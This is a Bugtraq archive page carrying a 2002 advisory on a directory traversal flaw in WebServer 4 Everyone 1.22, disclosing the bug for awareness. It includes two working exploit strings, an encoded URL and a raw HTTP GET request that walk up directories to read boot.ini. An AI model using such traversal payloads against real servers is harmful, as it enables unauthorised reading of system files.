Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

advisory
From: "UkR security team™" <cuctema () ok ru>
Date: Thu, 05 Sep 2002 16:30:30 +0400
 -----------  UkR security team advisory  ------------
     WebServer 4 Everyone directory traversal bug
 -----------------------------------------------------

Name:      WebServer 4 Everyone directory traversal bug
Date:                                        28.08.2002
Author:   UkR-XblP/ UkR security team/ http://ust.dp.ua
Application: WebServer 4 Everyone Version: 1.22 URL: http://www.freeware.lt/ 
Risk: An attacker can view every file in the remote sys
About:   WebServer 4 Everyone is a commercial webserver
                            that runs on Win32 systems.
Bug:  problem is caused by the character '\' (%5c) that
is not checked as bad character, so the server follow the path in the URI that the attacker give 
      until it reach the file requested.
Exploits: http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini 
              or GET /\..\..\..\..\..\boot.ini HTTP/1.0
     This last is an HTTP request that can be sent with
telnet because some browsers can modify the "\.." chars.

Greetz:     2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru

  By Date           By Thread  

Current thread:
  • advisory UkR security team™ (Sep 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]